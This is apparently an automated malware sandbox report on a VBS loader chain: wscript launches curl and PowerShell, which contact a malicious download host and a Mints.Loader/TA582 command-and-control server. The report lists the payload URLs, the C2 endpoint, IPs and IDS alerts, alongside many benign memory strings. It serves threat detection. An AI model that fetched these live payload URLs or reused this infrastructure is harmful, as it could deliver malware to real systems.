            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2433683508.0000024EBBFA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B3DD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2352549438.000001CA6B5E2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdban source: powershell.exe, 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: *e.pdb source: powershell.exe, 00000011.00000002.2352549438.000001CA6B584000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: powershell.exe, 00000011.00000002.2352549438.000001CA6B584000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.Core.pdbgRc2 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb; source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbatYs source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2435362967.0000024EBC210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2352549438.000001CA6B5D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb[dhc source: powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbL source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbEvX1 source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\curl.exe

            Networking

            Source: Network traffic; Suricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.6:49732 -> 193.149.129.61:80
            Source: Network traffic; Suricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.6:49732 -> 193.149.129.61:80
            Source: Network traffic; Suricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.6:49733 -> 193.149.129.61:80
            Source: Network traffic; Suricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.6:49733 -> 193.149.129.61:80
            Source: C:\Windows\System32\wscript.exe; Network Connect: 45.11.180.77 443
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; HTTP traffic: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive (observed twice)
            Source: Joe Sandbox View; ASN Name: DANISCODK DANISCODK
            Source: Joe Sandbox View; ASN Name: M247GB M247GB
            Source: Joe Sandbox View; JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
            Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global traffic; HTTP traffic detected: GET /list_files.php HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive (observed twice)
            Source: global traffic; HTTP traffic detected: GET /js/iethuj.txt HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET /js/bmkvfo.txt HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: gsosnub8zg3.top | Connection: Keep-Alive (observed twice)
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive (observed twice)
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (observed 3 times)
            Source: global traffic; HTTP traffic detected: GET /67618a47ee67a/67618a47ee8cd.vbs HTTP/1.1 | Host: pko-download.kagyouth.co.ke | User-Agent: curl/7.83.1 | Accept: */*
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='dhtq2YMRepnKwY9EJrtT9w'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="http://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='dhtq2YMRepnKwY9EJrtT9w'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol 
id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.com/?hl=en&tab=wT">Translate</a></li><li class=gbmtc><a class=gbmt id=gb_17 href="http://www.google.com/mobile/?hl=en&tab=wD">Mobile</a></li><li class=gbmtc><a class=gbmt id=gb_10 href="https://books.google.com/?hl=en&tab=wp">Books</a></li><li class=gbmtc><a class=gbmt id=gb_6 href="https://www.google.com/shopping?hl=en&source=og&tab=wf">Shopping</a></li><li class=gbmtc><a class=gbmt id=gb_30 href="http://www.blogger.com/?tab=wj">Blogger</a></li><li class=gbmtc><a class=gbmt id=gb_27 href="https://www.google.com/finance?tab=we">Finance</a></li><li class=gbmtc><a class=gbmt id=gb_31 href="https://photos.google.com/?tab=wq&pageId=none">Photos</a></li><li class=gbmtc><a class=gbmt id=gb_25 href="https://docs.google.com/document/?usp=docs_alc">Docs</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class=gbmtc><a href="https://www.google.com/intl/en/about/products?tab=wh" class=gbmt>Even more &raquo;</a><script nonce='dhtq2YMRe
            Source: global traffic	DNS traffic detected: DNS query: pko-download.kagyouth.co.ke
            Source: global traffic	DNS traffic detected: DNS query: gsosnub8zg3.top
            Source: global traffic	DNS traffic detected: DNS query: www.google.com
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA5359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA556E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA018B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gsosnub8zg3.top
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA018B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gsosnub8zg3.top/1.php?s=mints21
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
            Source: powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01AB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPa
            Source: powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00FDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01014000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA010E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA010F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3F9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA556E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA558A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA5578000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0044C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.comx
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA5596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3E4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3B60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA407D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA101D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA102FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00616000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
            Source: powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA558A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA101D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0044C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA407D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA5596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3E4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3B60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA101D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA102FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
            Source: wscript.exe, 00000007.00000002.2284685294.0000015CCBB40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281642188.0000015CCBB40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267622863.000001E9B13A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
            Source: powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
            Source: wscript.exe, 0000000A.00000003.2262779914.000001E9B1122000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2265704354.000001E9AF2CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262502439.000001E9AF382000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267541819.000001E9B1123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266409480.000001E9AF382000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2265742678.000001E9AF2D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266685065.000001E9AF635000.00000004.00000020.00020000.00000000.sdmp, 67618a47ee8cd.vbs.4.drString found in binary or memory: https://pko-download.kagyouth.co.ke/
            Source: curl.exe, 00000004.00000002.2172280031.000001979CB37000.00000004.00000020.00020000.00000000.sdmp, 67618a47ee8c5.vbsString found in binary or memory: https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
